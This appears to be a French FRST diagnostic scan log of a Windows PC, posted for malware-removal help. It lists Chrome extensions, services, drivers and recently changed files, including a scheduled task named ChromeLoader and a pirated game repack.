CHR Extension: (Gmail) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-11-14]
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Guest Profile [2022-01-09]
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1 [2021-12-01]
CHR Extension: (Slides) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-11-27]
CHR Extension: (Docs) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2021-11-27]
CHR Extension: (Google Drive) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-11-27]
CHR Extension: (YouTube) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-11-27]
CHR Extension: (Sheets) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-11-27]
CHR Extension: (Google Docs hors connexion) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-11-27]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-11-27]
CHR Extension: (Gmail) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-11-27]
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2 [2022-01-09]
CHR Extension: (Slides) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2021-11-28]
CHR Extension: (Docs) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\aohghmighlieiainnegkcijnfilokake [2021-11-28]
CHR Extension: (Google Drive) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\apdfllckaahabafndbhieahigkjlhalf [2021-11-28]
CHR Extension: (YouTube) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2021-11-28]
CHR Extension: (Sheets) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2021-11-28]
CHR Extension: (Google Docs hors connexion) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2021-11-28]
CHR Extension: (Paiements via le Chrome Web Store) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2021-11-28]
CHR Extension: (Gmail) - C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\Profile 2\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2021-11-28]
CHR Extension: (Options) - C:\Users\NzL_O\AppData\Local [2022-01-09]
CHR Profile: C:\Users\NzL_O\AppData\Local\Google\Chrome\User Data\System Profile [2022-01-09]

==================== Services (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

R2 CCDMonitorService; C:\Program Files (x86)\Acer\AOP Framework\CCDMonitorService.exe [2839296 2015-05-06] (Acer Incorporated -> Acer Incorporated)
R2 Dashlane Upgrade Service; C:\Program Files (x86)\Dashlane\Upgrade\DashlaneUpgradeService.exe [75056 2015-06-24] (Dashlane -> Dashlane SAS)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [934368 2021-10-01] (Epic Games Inc. -> Epic Games, Inc.)
R3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [2573568 2015-05-14] (Acer Incorporated -> Acer Incorporated)
R3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [335872 2015-05-19] (Intel Corporation) [Fichier non signé]
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-05-19] () [Fichier non signé]
S2 Kingsoft_WPS_UpdateService; C:\Program Files (x86)\Kingsoft\WPS Office\9.1.0.5113\wtoolex\wpsupdatesvr.exe [133480 2016-04-14] (Zhuhai Kingsoft Office Software Co.,Ltd -> Zhuhai Kingsoft Office Software Co.,Ltd)
R3 QALSvc; C:\Program Files\Acer\Acer Quick Access\QALSvc.exe [395616 2015-07-17] (Acer Incorporated -> Acer Incorporated)
R3 QASvc; C:\Program Files\Acer\Acer Quick Access\QASvc.exe [450400 2015-07-17] (Acer Incorporated -> Acer Incorporated)
R2 SecureLine; C:\Program Files\Avast Software\SecureLine VPN\VpnSvc.exe [9210136 2021-12-20] (Avast Software s.r.o. -> AVAST Software)
R2 TeamViewer; C:\Program Files\TeamViewer\TeamViewer_Service.exe [14754088 2021-11-06] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 UEIPSvc; C:\Program Files\Acer\User Experience Improvement Program\Framework\UBTService.exe [247040 2015-05-27] (Acer Incorporated -> acer)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\NisSrv.exe [2876152 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2111.5-0\MsMpEng.exe [128360 2021-12-20] (Microsoft Windows Publisher -> Microsoft Corporation)
S2 mccspsvc; "C:\Program Files\Common Files\McAfee\CSP\1.5.471.0\McCSPServiceHost.exe" [X]
S2 nvsvc; "C:\Windows\system32\nvvsvc.exe" [X]

===================== Pilotes (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

S3 aswVpnRdr; C:\WINDOWS\System32\drivers\aswVpnRdr.sys [56960 2021-11-14] (Avast Software s.r.o. -> Avast Software)
S3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-10-25] (Disc Soft Ltd -> Disc Soft Ltd)
S3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-10-25] (Disc Soft Ltd -> Disc Soft Ltd)
R3 LMDriver; C:\WINDOWS\System32\drivers\LMDriver.sys [31000 2018-05-15] (Acer Incorporated -> Acer Incorporated)
R3 RadioShim; C:\WINDOWS\System32\drivers\RadioShim.sys [25368 2018-05-15] (Acer Incorporated -> Acer Incorporated)
S3 ScpVBus; C:\WINDOWS\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
S3 ssudcdf; C:\WINDOWS\System32\drivers\ssudcdf.sys [36608 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssuddmgr; C:\WINDOWS\System32\drivers\ssuddmgr.sys [206080 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudobex; C:\WINDOWS\System32\drivers\ssudobex.sys [206080 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ssudqcfilter; C:\WINDOWS\System32\drivers\ssudqcfilter.sys [64912 2017-05-18] (Samsung Electronics Co., Ltd. -> QUALCOMM Incorporated)
S3 ssudrmnet; C:\WINDOWS\System32\drivers\ssudrmnet.sys [70400 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.)
S3 ssudserd; C:\WINDOWS\System32\drivers\ssudserd.sys [206080 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.(www.devguru.co.kr))
S3 ss_conn_usb_driver; C:\WINDOWS\System32\Drivers\ss_conn_usb_driver.sys [26368 2014-01-22] (DEVGURU CO LTD -> DEVGURU Co., LTD.)
S3 VBoxUSB; C:\WINDOWS\System32\Drivers\VBoxUSB.sys [114632 2015-09-16] (Duodian Online Technology Co. Ltd. -> BigNox Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2021-12-20] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [435432 2021-12-20] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [86248 2021-12-20] (Microsoft Windows -> Microsoft Corporation)
S3 xhunter1; C:\WINDOWS\xhunter1.sys [2740480 2021-12-06] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)

==================== NetSvcs (Avec liste blanche) ===================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)


==================== Un mois (créés) (Avec liste blanche) =========

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-09 20:01 - 2022-01-09 20:04 - 000032261 _____ C:\Users\NzL_O\Desktop\FRST.txt
2022-01-09 20:00 - 2022-01-09 20:03 - 000000000 ____D C:\FRST
2022-01-09 19:59 - 2022-01-09 19:59 - 002311168 _____ (Farbar) C:\Users\NzL_O\Desktop\FRST64.exe
2022-01-08 02:09 - 2020-03-28 16:31 - 000000000 ____D C:\Users\NzL_O\Desktop\Yu-Gi-Oh.Legacy.of.the.Duelist.Link.Evolution
2022-01-07 22:25 - 2022-01-07 22:26 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\Goldberg SteamEmu Saves
2022-01-07 21:55 - 2022-01-07 22:21 - 1934954865 _____ C:\Users\NzL_O\Desktop\Yu-Gi-Oh-Legacy-of-the-Duelist-Link-Evolution-Repack-Games.com.rar
2022-01-07 21:00 - 2022-01-07 21:00 - 000000000 ____D C:\Users\NzL_O\AppData\Local\chrome
2022-01-07 20:58 - 2022-01-07 20:58 - 000012830 _____ C:\WINDOWS\system32\Tasks\ChromeLoader
2021-12-28 16:37 - 2021-12-28 16:37 - 000000000 ____D C:\Users\NzL_O\AppData\Local\UnrealEngineLauncher
2021-12-28 16:37 - 2021-12-28 16:37 - 000000000 ____D C:\Users\NzL_O\AppData\Local\UnrealEngine
2021-12-28 16:37 - 2021-12-28 16:37 - 000000000 ____D C:\Users\NzL_O\AppData\Local\Epic Games
2021-12-28 16:33 - 2021-12-28 16:33 - 000001270 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Epic Games Launcher.lnk
2021-12-28 16:33 - 2021-12-28 16:33 - 000001258 _____ C:\Users\Public\Desktop\Epic Games Launcher.lnk
2021-12-28 16:32 - 2021-12-28 16:41 - 000000000 ____D C:\ProgramData\Epic
2021-12-28 16:32 - 2021-12-28 16:36 - 000000000 ____D C:\Program Files (x86)\Epic Games
2021-12-28 16:30 - 2021-12-28 16:31 - 157548544 _____ C:\Users\NzL_O\Downloads\EpicInstaller-13.0.0.msi
2021-12-28 14:35 - 2021-12-28 14:36 - 747242006 _____ C:\Users\NzL_O\Desktop\CSS Game Content.zip
2021-12-24 00:12 - 2021-12-24 00:12 - 000000000 ____D C:\WINDOWS\SystemTemp
2021-12-23 13:17 - 2021-12-23 13:17 - 000223744 _____ C:\WINDOWS\SysWOW64\TpmTool.exe
2021-12-23 13:17 - 2021-12-23 13:17 - 000011979 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-12-23 13:15 - 2021-12-23 13:15 - 000272384 _____ C:\WINDOWS\system32\TpmTool.exe
2021-12-23 13:15 - 2021-12-23 13:15 - 000162816 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-12-23 11:12 - 2021-12-23 11:12 - 000000000 ___HD C:\$WinREAgent
2021-12-20 14:40 - 2021-12-20 14:40 - 000003540 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d7df244531b216
2021-12-20 14:37 - 2021-12-20 14:37 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-1677540230-3073805055-3309549447-1001

==================== Un mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-09 19:51 - 2021-11-14 14:39 - 000000000 ____D C:\Program Files (x86)\Google
2022-01-09 19:49 - 2021-11-15 14:03 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\discord
2022-01-09 19:48 - 2021-11-15 14:02 - 000000000 ____D C:\Users\NzL_O\AppData\Local\Discord
2022-01-09 19:48 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-09 11:55 - 2021-11-15 19:39 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\.PixelmonUltra
2022-01-09 11:07 - 2021-11-14 15:40 - 000000000 ____D C:\Program Files (x86)\Steam
2022-01-09 10:38 - 2021-11-19 02:16 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\Blitz
2022-01-09 10:36 - 2021-11-19 02:17 - 000000032 _____ C:\Users\NzL_O\AppData\Roaming\.machineId
2022-01-09 10:35 - 2021-11-14 14:34 - 000000000 ___RD C:\Users\NzL_O\OneDrive
2022-01-09 10:34 - 2021-11-14 14:48 - 000000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2022-01-09 10:34 - 2021-11-14 14:29 - 000000000 __SHD C:\Users\NzL_O\IntelGraphicsProfiles
2022-01-09 07:42 - 2021-11-21 23:04 - 000000000 ____D C:\Users\NzL_O
2022-01-09 01:51 - 2021-11-21 22:58 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-01-08 13:22 - 2021-11-21 23:14 - 001770906 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-01-08 13:22 - 2019-12-07 15:49 - 000792842 _____ C:\WINDOWS\system32\perfh00C.dat
2022-01-08 13:22 - 2019-12-07 15:49 - 000149972 _____ C:\WINDOWS\system32\perfc00C.dat
2022-01-08 13:22 - 2019-12-07 10:13 - 000000000 ____D C:\WINDOWS\INF
2022-01-08 13:14 - 2021-11-21 23:26 - 000004028 _____ C:\WINDOWS\system32\Tasks\Avast SecureLine VPN Update
2022-01-08 13:14 - 2021-11-21 23:26 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-01-08 13:14 - 2021-11-17 15:37 - 000000000 ____D C:\Program Files\TeamViewer
2022-01-08 13:13 - 2021-11-21 22:57 - 000008192 ___SH C:\DumpStack.log.tmp
2022-01-06 21:47 - 2021-11-14 14:20 - 000002446 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-01-06 21:47 - 2021-11-14 14:20 - 000002284 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-01-06 21:47 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-01-06 21:47 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-01-05 19:26 - 2021-11-14 14:41 - 000002249 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-01-05 19:26 - 2021-11-14 14:41 - 000002208 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-01-05 10:47 - 2015-07-16 04:32 - 000000000 ____D C:\ProgramData\AVAST Software
2022-01-05 10:46 - 2019-12-07 10:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2021-12-28 17:49 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2021-12-28 16:41 - 2021-11-15 16:27 - 000000000 ____D C:\Users\NzL_O\AppData\Local\D3DSCache
2021-12-28 16:41 - 2021-11-14 14:32 - 000000000 ____D C:\Users\NzL_O\AppData\Local\NVIDIA Corporation
2021-12-28 16:40 - 2016-04-14 12:02 - 000000000 ____D C:\ProgramData\Package Cache
2021-12-28 16:37 - 2021-11-19 02:17 - 000000000 ____D C:\Users\NzL_O\AppData\Local\EpicGamesLauncher
2021-12-24 00:15 - 2021-11-21 22:57 - 000266808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\SystemResources
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\setup
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lv-LV
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\lt-LT
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\et-EE
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\system32\es-MX
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\Provisioning
2021-12-24 00:12 - 2019-12-07 10:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2021-12-23 13:49 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\servicing
2021-12-23 13:49 - 2019-12-07 10:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2021-12-23 11:09 - 2021-11-15 02:19 - 000000000 ____D C:\WINDOWS\system32\MRT
2021-12-23 11:00 - 2021-11-15 02:19 - 137938848 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2021-12-21 06:37 - 2021-11-14 15:40 - 000001040 _____ C:\Users\Public\Desktop\Steam.lnk
2021-12-20 19:51 - 2021-11-16 19:24 - 000000000 ____D C:\Users\NzL_O\AppData\Local\ElevatedDiagnostics
2021-12-20 19:39 - 2015-07-16 04:34 - 000000000 ____D C:\ProgramData\McAfee
2021-12-20 19:03 - 2021-11-14 15:11 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2021-12-20 19:03 - 2019-12-07 10:14 - 000000000 ____D C:\Program Files\Windows Defender
2021-12-20 18:55 - 2019-12-07 10:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2021-12-20 16:55 - 2021-12-06 22:07 - 000000000 ____D C:\Users\NzL_O\AppData\Local\GameAnalytics
2021-12-20 16:51 - 2021-11-14 15:46 - 000000000 ____D C:\Users\NzL_O\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2021-12-20 14:40 - 2021-11-21 23:26 - 000003634 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-12-14 17:15 - 2021-11-14 23:23 - 000036120 _____ (Avast Software) C:\WINDOWS\system32\icarus_rvrt.exe

==================== Fichiers à la racine de certains dossiers ========

2021-11-19 02:17 - 2022-01-09 10:36 - 000000032 _____ () C:\Users\NzL_O\AppData\Roaming\.machineId

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

==================== Fin de FRST.txt ========================

Publicité


Signaler le contenu de ce document

Publicité